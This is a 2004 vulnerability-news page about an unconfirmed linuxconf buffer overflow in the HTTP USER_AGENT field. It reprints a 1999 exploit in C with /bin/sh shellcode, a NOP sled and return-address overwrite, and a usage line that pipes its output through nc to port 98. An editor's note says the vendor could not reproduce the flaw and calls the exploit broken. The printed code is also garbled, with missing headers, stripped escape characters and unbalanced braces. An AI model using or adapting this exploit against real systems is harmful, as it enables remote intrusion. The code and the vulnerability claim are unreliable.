Main Menu
Network
Sponsor
Top 10 Sites
Partners
|
|
Top Submit newsSubscribe 
Communication | Computer Crime | Digital Audio, Video, Photo | General News | Hardware | Internet | Mobile | PDA | Security | Software | Vulnerability |
Previous articleBack to news listNext article
| Sponsored links | Want to become one of our authors and see your work published on ALLSeek.iNFO ?
| | Linuxconf USER_AGENT Potential Buffer Overflow May Permit Remote Code Execution |
|---|
Categorie: Vulnerability
Posted: 2004-02-24 by ReCall
Views: 531
Source: Click here
| Current Rating: Not rated
|
| | Details |
|---|
Description: In December 1999, a potential buffer overflow vulnerability was reported in linuxconf. A remote user may be able to execute arbitrary code on the target system.
An exploit that purports to trigger a buffer overflow in the processing of the HTTP USER_AGENT field was reported.
/*
linuxconf exploit by R00T-X (c) 1999
USER_AGENT overflow x86
should work on all linux's but you need to have
network access to linuxconf
greetz to: j0e, AcidCrunCh, |420|, umm and everyone who knows me, heh :P
have fun with this but for EDUCATIONAL PURPOSES :)
Usage: (./linexp ;cat)| nc targethost 98
*/
char shell[] =
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90xebx3bx5ex89x76x08x31xedx31xc9x31xc0x88"
"x6ex07x89x6ex0cxb0x0bx89xf3x8dx6ex08x89xe9x8dx6e"
"x0cx89xeaxcdx80x31xdbx89xd8x40xcdx80x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"xe8xc0xffxffxff/bin/shx00";
#include
#include
#include
#include
#define BUFLEN 1025
#define NOP 0x90
void
main (int argc, char *argv[])
char buf[BUFLEN];
int offset,nop,i;
unsigned long esp;
char shell[1024+300];
if(argc < 2)
{
fprintf(stderr,"usage: (%s ;cat)|nc host.com 98n", argv[0]);
exit(0);
}
nop = 511;
esp = 0xefbfd5e8;
offset = atoi(argv[1]);
memset(buf, NOP, BUFLEN);
memcpy(buf+(long)nop, shell, strlen(shell));
for (i = 256; i < BUFLEN - 3; i += 2)
{ *((int *) &buf[i]) = esp + (long) offset;
shell[ sizeof(shell)-1 ] = 0;
printf("POST / HTTP/1.0rnContent-Length: %d, User-agent: rn", BUFLEN);
for (i = 0; i < BUFLEN; i++)
putchar(buf[i]);
printf("rn");
return;
[Editor's note: As posted in 'http://lwn.net/1999/1223/a/linuxconfresponse.html', the vendor was unable to reproduce the vulnerability. The vendor also notes that the exploit is broken. The CVE entry for this item (CAN-2000-0017) lists 4 'NOOP' votes and 2 'REJECT' votes.]
Impact: A remote user may be able to execute arbitrary code on the target system.
Solution: This vulnerability is unconfirmed.
| | Syndication |
|---|
Permalink Email this
The URI to TrackBack this entry is:
http://allseek.info/news/trackback.php?id=735
| | User comments (post your comments ) |
|---|
Only registerd members can post comments and articles
|
| Previous articleBack to news listNext article
|
|
|
|
InterJOB.su
|
